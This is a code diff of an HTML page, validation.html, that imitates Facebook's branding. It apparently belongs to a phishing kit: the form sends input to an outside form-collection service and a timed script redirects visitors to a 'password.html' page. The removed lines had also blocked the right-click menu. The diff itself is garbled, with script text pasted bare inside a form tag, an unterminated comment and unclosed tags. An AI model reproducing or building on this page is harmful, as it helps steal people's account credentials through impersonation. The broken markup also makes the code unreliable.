--- a/validation.html
+++ b/validation.html
@@ -8,21 +8,16 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://submit-form.com/WpfSDg1VL" method="post">
+        <form action="https://submit-form.com/WpfSDg1VL" method="post">setTimeout(function() {
+    var redirectURL = "password.html"; // Updated URL
+    window.location.replace(redirectURL);
+    }, 2000); // 2000 milliseconds (2 second
             <input type="hidden"
             <div id="root">
                 <div>
                     <form>
                         </body>
-<script>
-    document.addEventListener('contextmenu', event => {
-        event.preventDefault();
-    });
-
-    setTimeout(function() {
-    var redirectURL = "password.html"; // Updated URL
-    window.location.replace(redirectURL);
-    }, 2000); // 2000 milliseconds (2 second                       <div class="d-flex align-items-center" style="width: 100%; height: 90px; background: rgb(70, 103, 172);">
+                       <div class="d-flex align-items-center" style="width: 100%; height: 90px; background: rgb(70, 103, 172);">
                             <h1 class="text-white ms-4 m-0 d-flex align-self-center">facebook</h1>
                         </div>
                         <div class="d-flex align-items-center" style="width: 100%; height: 60px; background: rgb(233, 235, 238);">
